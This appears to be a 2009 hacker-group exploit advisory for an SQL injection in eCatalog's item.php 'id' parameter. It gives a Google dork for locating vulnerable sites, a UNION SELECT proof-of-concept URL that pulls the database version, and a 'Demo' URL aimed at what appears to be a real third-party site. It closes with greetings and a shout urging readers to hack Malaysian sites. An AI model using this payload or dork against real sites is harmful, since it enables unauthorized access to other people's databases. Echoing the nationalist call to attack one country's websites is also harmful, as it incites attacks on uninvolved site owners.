root@indonesiancoder.com
http://www.indonesiancoder.com

#############################################################
## eCatalog Software - item.php?id ##
## Author : Don Tukulesto (tukulesto[at]hackermail[dot]com)##
## Cyb3r_tr0n ( cyb3r_tr0n[at]hackermail[dot]com )##
## Homepage : http://www.indonesiancoder.com ##
## Date : Sunday, August 30, 2009 ##
#############################################################

[ Software Information ]

[+] Software : eCatalog
[+] Vulnerability : SQL injection
[+] Google Dork : inurl:item.php?id "eCatalog"

#############################################################

[ POC ]

http://127.0.0.1/item.php?id=[ID]+union+select+1,2,3,4,5,6,version(),8,9,10,11,12,13,14,15--

[ID] = Valid ID

[ Demo ]

http://www.ibcom.com.my/catalog/item.php?id=-493+union+select+1,2,3,4,5,6,version(),8,9,10,11,12,13,14,15--

#############################################################

[ Greetings ]

[+] All of Indonesian Coder Member, mistersaint, gonzhack, m364tr0n, m3nw5, TUCKER, Petrucii, Chercut,
Senot, Joker, Rebel, Quick_5ilv3r, ran, m4ho666, DenBayan, vyc0d
[+] All of Surabayahackerlink Member, bejat Bejat, Plaque, rey_cute, Tuex, XNITRO, DraCoola
[+] ServerIsDown.org, Jack-, Yadoy666, kecemplungkalen, xshadow, H4ck3rKu, eminem
[+] Kill-9 crew, kaMtiEz, arianom

[ SHOUT ]

Nggak puasa, tapi kelaparan >.<" (M3NW5 STYLE :p)
STILL FVCKED TO MALAYSIA, TRULLY THIEF COUNTRY IN ASIA.
Let's Hack Malaysian site. PROUD TO BE INDONESIAN !!!!!